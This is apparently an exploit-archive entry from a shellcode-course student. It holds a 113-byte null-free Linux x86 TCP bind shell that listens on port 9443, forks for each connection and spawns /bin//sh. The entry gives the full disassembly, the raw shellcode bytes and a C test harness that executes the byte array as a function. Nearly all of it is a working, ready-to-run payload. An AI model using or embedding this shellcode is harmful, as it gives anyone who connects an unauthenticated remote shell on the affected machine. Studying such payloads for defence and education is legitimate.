
Linux/x86 - Bind (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)


Linux TCP Bind Shell, fork(), Null-Free Shellcode

/*
Title:      Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
Author:     Amine Kanane <[email protected]>
Student-ID: SLAE - 1203
Desc:       Listen for a connection on Local Port 9443 and spawn a command shell
            This version supports multiple simultaneous connections using fork().
            Also, this shellcode does not use the classic socketcall() syscall.
Tested on:  Linux/x86 - SMP Debian 4.9.30-1kali1
Date:       7 May 2018
Disassembly of section .text:
08048060 <_start>:
 8048060:	31 c0                	xor    eax,eax
 8048062:	31 db                	xor    ebx,ebx
 8048064:	31 c9                	xor    ecx,ecx
 8048066:	31 d2                	xor    edx,edx
 8048068:	66 b8 67 01          	mov    ax,0x167
 804806c:	b3 02                	mov    bl,0x2
 804806e:	b1 01                	mov    cl,0x1
 8048070:	cd 80                	int    0x80
 8048072:	89 c3                	mov    ebx,eax
 8048074:	66 b8 69 01          	mov    ax,0x169
 8048078:	52                   	push   edx
 8048079:	66 68 24 e3          	pushw  0xe324 ; <== This is where the port number is set; note that the value must be in network byte order (i.e. converted with htons()) first :)
 804807d:	66 6a 02             	pushw  0x2
 8048080:	89 e1                	mov    ecx,esp
 8048082:	b2 10                	mov    dl,0x10
 8048084:	cd 80                	int    0x80
 8048086:	66 b8 6b 01          	mov    ax,0x16b
 804808a:	31 c9                	xor    ecx,ecx
 804808c:	cd 80                	int    0x80
0804808e <infinite>:
 804808e:	31 d2                	xor    edx,edx
 8048090:	31 f6                	xor    esi,esi
 8048092:	66 b8 6c 01          	mov    ax,0x16c
 8048096:	cd 80                	int    0x80
 8048098:	89 c6                	mov    esi,eax
 804809a:	31 c0                	xor    eax,eax
 804809c:	b0 02                	mov    al,0x2
 804809e:	cd 80                	int    0x80
 80480a0:	31 ff                	xor    edi,edi
 80480a2:	39 f8                	cmp    eax,edi
 80480a4:	75 e8                	jne    804808e <infinite>
 80480a6:	31 c0                	xor    eax,eax
 80480a8:	b0 06                	mov    al,0x6
 80480aa:	cd 80                	int    0x80
 80480ac:	89 f3                	mov    ebx,esi
 80480ae:	b1 02                	mov    cl,0x2
080480b0 <loop_dup>:
 80480b0:	b0 3f                	mov    al,0x3f
 80480b2:	cd 80                	int    0x80
 80480b4:	fe c9                	dec    cl
 80480b6:	79 f8                	jns    80480b0 <loop_dup>
 80480b8:	31 c0                	xor    eax,eax
 80480ba:	50                   	push   eax
 80480bb:	89 e2                	mov    edx,esp
 80480bd:	68 2f 2f 73 68       	push   0x68732f2f
 80480c2:	68 2f 62 69 6e       	push   0x6e69622f
 80480c7:	89 e3                	mov    ebx,esp
 80480c9:	50                   	push   eax
 80480ca:	53                   	push   ebx
 80480cb:	89 e1                	mov    ecx,esp
 80480cd:	b0 0b                	mov    al,0xb
 80480cf:	cd 80                	int    0x80
*/

#include<stdio.h>
#include<string.h>

/*
 * Raw i386 machine code of the bind shell disassembled in the header comment
 * above. Every byte is load-bearing: the array must stay exactly as listed
 * (113 bytes) and contains no 0x00 byte, which is why it doubles as a valid
 * NUL-terminated string and strlen() can report its length.
 *
 * Reading the disassembly, the immediates loaded into eax are the i386 direct
 * socket syscalls (0x167 socket, 0x169 bind, 0x16b listen, 0x16c accept4)
 * rather than socketcall(), followed by 2 fork, 6 close, 0x3f dup2 and
 * 0xb execve of "/bin//sh". The two bytes marked below are the listening port
 * in network byte order (0xe324 == htons(9443)).
 */
unsigned char code[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8"
                       "\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3"
                       "\x66\xb8\x69\x01\x52\x66\x68"
                       "\x24\xe3" // ==> port number = 9443; sock_ad.sin_port = htons(9443);
                       "\x66\x6a\x02\x89\xe1\xb2\x10\xcd\x80\x66"
                       "\xb8\x6b\x01\x31\xc9\xcd\x80\x31\xd2\x31"
                       "\xf6\x66\xb8\x6c\x01\xcd\x80\x89\xc6\x31"
                       "\xc0\xb0\x02\xcd\x80\x31\xff\x39\xf8\x75"
                       "\xe8\x31\xc0\xb0\x06\xcd\x80\x89\xf3\xb1"
                       "\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x31"
                       "\xc0\x50\x89\xe2\x68\x2f\x2f\x73\x68\x68"
                       "\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1"
                       "\xb0\x0b\xcd\x80";
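/*
 * Test harness: print the payload length, then transfer control to the byte
 * array `code`. On success the call never returns — per the disassembly the
 * parent loops in accept() and each forked child replaces itself via
 * execve() — so the final return is reached only if the indirect call comes
 * back. On a build whose data segment is non-executable (the default with
 * NX-enforcing toolchains) the call faults instead of running the bytes.
 *
 * Fixes over the original: `main()` with an implicit int return type is not
 * valid C99/C11; strlen() returns size_t, so "%d" was a mismatched conversion
 * (undefined behavior) and "%zu" is used; the cast to `const char *` avoids
 * the unsigned char*/char* pointer-type mismatch; the function pointer type
 * is given a proper prototype.
 */
int main(void)
{
	/* strlen() is meaningful only because the payload contains no 0x00 byte. */
	printf("Shellcode Length: %zu\n", strlen((const char *)code));

	/* Deliberate data-as-code step of the harness: reinterpret the array's
	 * address as a function pointer and call it. This relies on `code`
	 * living in an executable mapping; it is not a portable construct. */
	int (*ret)(void) = (int (*)(void))code;
	ret();

	return 0;
}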
